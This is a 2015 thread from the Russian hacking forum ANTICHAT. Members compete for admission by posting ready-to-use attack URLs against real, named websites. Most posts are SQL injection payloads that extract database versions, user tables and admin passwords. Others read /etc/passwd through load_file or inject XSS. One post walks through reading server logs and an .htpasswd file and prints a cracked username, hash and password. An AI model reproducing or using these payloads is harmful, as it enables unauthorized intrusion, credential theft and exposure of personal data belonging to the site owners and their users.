ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

15.07.2015, 02:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Сайт: http://www.thebandroom.biz/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.thebandroom.biz/01_search_auto2.php/items.php?id=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21 and '0'='0
Сайт: http://www.sacaindia.org/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.sacaindia.org/news.php?ID=-1' union all select 1,2,3,current_user,5,6,7,@@version,9,10,11 and '0'='0
Сайт: http://www.offball.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.offball.com/news.php?id=-1 union all select @@version,current_user,3,4,5
Сайт: http://www.coolncute.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.coolncute.com/data/page.php?id=-1 union all select 1,2,3,@@version,current_user,6,7,8,9,10,11,12,13,14&sort=1
Сайт: http://www.damandiri.or.id/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.damandiri.or.id/detail.php?id=-1' union all select 1,2,3,4,5,@@version,7,8,9,10,current_user,12,13 and '0'='0
Сайт: http://www.begeerte.be/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.begeerte.be/page.php?page=productie&ID=-1' union all select 1,2,3,current_user,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 and '0'='0
Сайт: http://www.hospitallocaldepiedecuesta.org/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.hospitallocaldepiedecuesta.org/page.php?id=-1' union all select 1,2,@@version,4,current_user,6,7,8 and '0'='0
Сайт: http://www.etssp.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.etssp.com/article.php?id=-1 union all select 1,current_user,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Сайт: http://www.worldbarefootcouncil.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.worldbarefootcouncil.com/news.php?id=-1' union all select 1,current_user,3,4,@@version,6,7,8,9,10,11 and '0'='0
Сайт: http://www.kulmbacher-tierheim.de/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.kulmbacher-tierheim.de/Detail.php?ID=-1 union all select 1,2,3,current_user,@@version,6,7,8,9
|
|
|
|

16.07.2015, 05:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 650
Репутация:
0
|
|
Код:
Code:
http://www.ukeas.ph/ukeasnews-event-detail.php?id=32799999 union select 1,2,3,4,concat_ws(0x3a,user_id,user_name,passwd,email),5,6,7,8,9,10,11,12+from+db_users+limit+2,1--
http://www.rokebyschool.co.uk/news/news.php?id=32799999+UNION%20SELECT%201,2,concat_ws(0x3a,id,email,password,admin_user_level_id,active),4,5,6,7,8,9,10,11,12+from+admin_users+limit+0,1
И вот не докрутил тут, глянь, интересно что там http://integra.eu/press.cfm?id=327
|
|
|
|

19.07.2015, 15:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 521
Репутация:
0
|
|
Сайт: www.marcied.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.marcied.com/photo.php?id=346+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
|
|
|
|

20.07.2015, 13:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от joelblack
joelblack said:
↑
target:police.gov.bd
type:SQL Injection
version:5.1.69
Код:
Code:
http://www.police.gov.bd/history.php?id=51'+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
добавил
Сообщение от ocheretko
ocheretko said:
↑
XSS уязвимость
Код:
Code:
http://www.001kanpou.com/search.asp?searchkey=%3C/div%3E%3C/div%3E%3C/form%3E%3Cbody%20background=%22/img/logo.gif%22%20width=%22100%%22%20height=%22100%%22%3E%3Cscript%3Ealert%28
/XSS/%29%3C/script%3E
Сообщение от ocheretko
ocheretko said:
↑
Сайт:
http://celtsat.com.br
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://celtsat.com.br/produto_cat.php?id=13+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.albit.com.au
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.albit.com.au/product_cat.php?id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: nijifan.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://nijifan.com/index.php?Language=1&cat_id=222&scat_id=301+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.apva.org
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.apva.org/rediscovery/page.php?page_id=6+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.th.boots.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.th.boots.com/eng/brands_cat.php?brand_id=43+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.shanson.biz
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.shanson.biz/text/index.php?song=1097+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.io-arch.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.tokaiguitar.de
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.tokaiguitar.de/produktdetail.php?id=15+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: islamic-wallpapers.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://islamic-wallpapers.com/sub_cat.php?id=4+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.florentina.ro
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.florentina.ro/index.php?cat_id=11+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.pronv.us
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.pronv.us/catalog.php?id_cat=19&sm=3+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: ravco.jp
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.themasterswoodshop.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
это добавил.
Сообщение от ocheretko
ocheretko said:
↑
Сайт:
www.themasterswoodshop.com
Уязвимость:
Local File Reading
Эксплоит:
Код:
Code:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4--
Сайт:
www.io-arch.com
Уязвимость:
Local File Reading
Эксплоит:
Код:
Code:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4,5,6,7,8,9--
Сайт:
www.ravco.jp
Уязвимость:
Local File Reading
Эксплоит:
Код:
Code:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union%20Select%20%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)%20))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20--
это, скорее, sqli с правами на чтение, поэтому защитано как sqli. Добавил +28 очков
Сообщение от O1d
O1d said:
↑
Код:
Code:
http://www.ukeas.ph/ukeasnews-event-detail.php?id=32799999 union select 1,2,3,4,concat_ws(0x3a,user_id,user_name,passwd,email),5,6,7,8,9,10,11,12+from+db_users+limit+2,1--
http://www.rokebyschool.co.uk/news/news.php?id=32799999+UNION%20SELECT%201,2,concat_ws(0x3a,id,email,password,admin_user_level_id,active),4,5,6,7,8,9,10,11,12+from+admin_users+limit+0,1
И вот не докрутил тут, глянь, интересно что там
http://integra.eu/press.cfm?id=327
добавил
Сообщение от Abrigen
Abrigen said:
↑
Сайт:
www.marcied.com
Уязвимость:
SQL Injection
Эксплоит:
Код:
Code:
http://www.marcied.com/photo.php?id=346+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
sqli гуглится, не добавлена.
|
|
|

20.07.2015, 13:58
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от Печа
Печа said:
↑
Сайт:
http://www.thebandroom.biz/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.thebandroom.biz/01_search_auto2.php/items.php?id=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21 and '0'='0
Сайт:
http://www.sacaindia.org/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.sacaindia.org/news.php?ID=-1' union all select 1,2,3,current_user,5,6,7,@@version,9,10,11 and '0'='0
Сайт:
http://www.offball.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.offball.com/news.php?id=-1 union all select @@version,current_user,3,4,5
Сайт:
http://www.coolncute.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.coolncute.com/data/page.php?id=-1 union all select 1,2,3,@@version,current_user,6,7,8,9,10,11,12,13,14&sort=1
Сайт:
http://www.damandiri.or.id/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.damandiri.or.id/detail.php?id=-1' union all select 1,2,3,4,5,@@version,7,8,9,10,current_user,12,13 and '0'='0
Сайт:
http://www.begeerte.be/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.begeerte.be/page.php?page=productie&ID=-1' union all select 1,2,3,current_user,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 and '0'='0
Сайт:
http://www.hospitallocaldepiedecuesta.org/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.hospitallocaldepiedecuesta.org/page.php?id=-1' union all select 1,2,@@version,4,current_user,6,7,8 and '0'='0
Сайт:
http://www.etssp.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.etssp.com/article.php?id=-1 union all select 1,current_user,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Сайт:
http://www.worldbarefootcouncil.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.worldbarefootcouncil.com/news.php?id=-1' union all select 1,current_user,3,4,@@version,6,7,8,9,10,11 and '0'='0
Сайт:
http://www.kulmbacher-tierheim.de/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.kulmbacher-tierheim.de/Detail.php?ID=-1 union all select 1,2,3,current_user,@@version,6,7,8,9
тоже все добавил, вы проходите
у нас уже трое человек попавших через конкурс, @ Печа, @ 3nvY, @ ocheretko
|
|
|

22.07.2015, 15:50
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 29
Репутация:
0
|
|
Сайт Украинского телеканала
Код:
Code:
http://www.hromadske.tv/search?s=%27;alert%28%27antichat%27%29;//
Уязвимость интересна новичкам тем, что работает в Chrome - инжект в Javascript var stext1 = '';alert('antichat');//';
|
|
|

22.07.2015, 16:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 521
Репутация:
0
|
|
Сайт: www.gamagroupusa.com
Уязвимость: Sql inj
Код:
Code:
http://www.gamagroupusa.com/index.php?i=1+union+select+1,2,3,version()+--+
|
|
|
|

23.07.2015, 10:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 6419
Репутация:
2
|
|
Сайт: http://www.karmatube.org
Уязвимость: XSS
Эксплоит:
Код:
Code:
http://www.karmatube.org/videos.php?op=filter&cat=%253Cscript%253Ealert%28%25271%2527%29%253C/script%253E
|
|
|
|

23.07.2015, 14:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 650
Репутация:
0
|
|
http://www.sicb.org/
FILE_PRIV=Y
106 columns
/etc/passwd:
Код:
Code:
http://www.sicb.org/meetings/2015/schedule/abstractdetails.php?id=199999997 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,load_file(0x2f6574632f706173737764),48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106+from+mysql.user
Методом ручного фазинга узнаем расположение логов.
Читаем логи /var/log/httpd/error_log и видим расположение файлов веб-сервера в /var/www/html
Читаем .htaccess админки из /var/www/html/admin/.htaccess:
Сообщение от None
AuthUserFile /home/sicb/includes/.htpasswd
AuthName "SICB Admin realm"
AuthType Basic
require valid-user
Читаем файл с паролем и брутим:
Сообщение от None
ruedi:UMn02wTYUxVGc -> ottilie
Но фейл в админку не пускает, видимо фильтр по IP т.к. бейсик авторизацию уже мы проходим.
PS БД очень большая в ней 9 БД и инфа начиная с 2002 года о студентах, докторах, профессорах. Дампить не стал.
|
|
|
|

23.07.2015, 14:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 91312
Репутация:
12
|
|
Site: http://www.safetylit.org
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.safetylit.org/week/journalpage.php?jid=-1+UNION+SELECT+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|